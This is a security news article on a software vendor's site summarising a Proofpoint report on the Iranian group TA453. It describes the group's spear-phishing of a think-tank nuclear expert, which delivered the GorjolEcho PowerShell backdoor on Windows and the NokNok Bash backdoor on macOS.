Iranian APT Targets Both Windows and Mac Victims

iran computer hackers attack

TA453, an Iranian nation-state actor, has been connected to a fresh wave of spear-phishing attacks that infect Windows and macOS operating systems with malicious software.

According to a recent report from Proofpoint, TA453 employed various cloud hosting providers to execute a new infection chain, deploying a newly identified PowerShell backdoor called GorjolEcho.

Furthermore, TA453 expanded its tactics by attempting to launch an Apple-oriented infection chain called NokNok and employed multi-persona impersonation in its relentless pursuit of espionage.

Threat Actor's Past Exploits

This threat group, also known as APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, has ties to Iran's Islamic Revolutionary Guard Corps (IRGC) and has been active since at least 2011. Volexity recently revealed their usage of an updated version of the PowerShell implant CharmPower (also known as GhostEcho or POWERSTAR).

In a recent attack observed by an enterprise security firm in May 2023, TA453 sent phishing emails to a nuclear security expert at a U.S.-based think tank focused on foreign affairs. These emails contained a malicious link to a Google Script macro, which redirected the target to a Dropbox URL hosting a RAR archive.

Within this file, an LNK dropper initiated a multi-stage process that ultimately deployed GorjolEcho. This backdoor displayed a decoy PDF document while secretly waiting for next-stage payloads from a remote server. However, upon discovering that the target was using an Apple computer, TA453 modified its approach. They sent a second email with a ZIP archive containing a Mach-O binary disguised as a VPN application. In reality, this binary was an AppleScript that connected to a remote server to download a Bash script-based backdoor known as NokNok.

NokNok, in turn, retrieved up to four modules capable of gathering information on running processes, installed applications, system metadata, and establishing persistence through LaunchAgents.

These modules shared significant functionality with the modules associated with CharmPower, and NokNok exhibited similarities in source code to macOS malware previously attributed to the TA453 group in 2017.

The threat actor also utilized a fraudulent file-sharing website, likely as a means to fingerprint visitors and track successful victims.

By Zaib
July 7, 2023
Computer Security
English
July 7, 2023
Computer Security

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

4 years ago

Microsoft Warns State-Backed Threat Actors Are Using AI in...

4 days ago

Trojan Al11 Malware Detection & Removal - An Essential...

11 months ago

Pinaview is a Fully-Featured Adware App

10 months ago

"Your iCloud is Being Hacked" and "Your iPhone has Been...

7 months ago

What is Lucky Ransomware?

7 months ago

Related Posts

Computer Security

State-Backed Iranian APT Attacks Targets in Turkey

According to security intelligence researchers with Cisco Talos, an advanced persistent threat group operating out of Iran has been targeting both private and government organizations located in Turkey. The APT in... Read more

February 1, 2022
Adware, Mac Malware

MotionCycle Adware Targets Mac OS Computers

MotionCycle is an adware threat that is known to be found on Mac OS computers. The MotionCycle adware may appear as a simple icon within the Applications folder of Mac computers. However, the MotionCycle adware may... Read more

July 21, 2022
Adware, Mac Malware

MetroToken Adware Targets Mac Computers

MetroToken is a type of adware that affects Mac operating systems. This malware displays unwanted advertisements and redirects users to potentially harmful websites. It is important to remove MetroToken adware from... Read more

April 17, 2023
English
Loading...

Cyclonis Backup Details & Terms

The Free Basic Cyclonis Backup plan gives you 2 GB of cloud storage space with full functionality! No credit card required. Need more storage space? Purchase a larger Cyclonis Backup plan today! To learn more about our policies and pricing, see Terms of Service, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Backup Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Backup's Terms of Service Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2024 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.